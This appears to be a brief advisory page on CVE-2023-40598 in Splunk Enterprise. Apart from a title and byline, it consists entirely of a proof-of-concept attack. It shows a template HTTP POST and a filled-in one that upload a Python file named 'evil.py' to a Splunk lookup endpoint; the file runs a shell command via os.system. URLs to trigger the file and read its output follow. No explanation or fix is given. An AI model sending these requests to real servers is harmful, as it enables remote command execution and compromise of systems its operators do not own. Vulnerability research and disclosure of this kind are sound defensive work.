Splunk Enterprise affected by CVE-2023-40598

Kondukto Security Team, 05 Feb 2024

POST /en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
Content-Length: <length>

lookup_external.py&lookup=<file_name>&data=<file_content>

POST /en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external HTTP/1.1
Host: 192.168.1.100:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 113

lookup_external.py&lookup=evil.py&data=import+os%0Aos.system%28%27whoami+%3E+output.txt%27%29

<http://192.168.1.100:8000/en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external?lookup=evil.py>
<http://192.168.1.100:8000/en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external?lookup=output.txt>
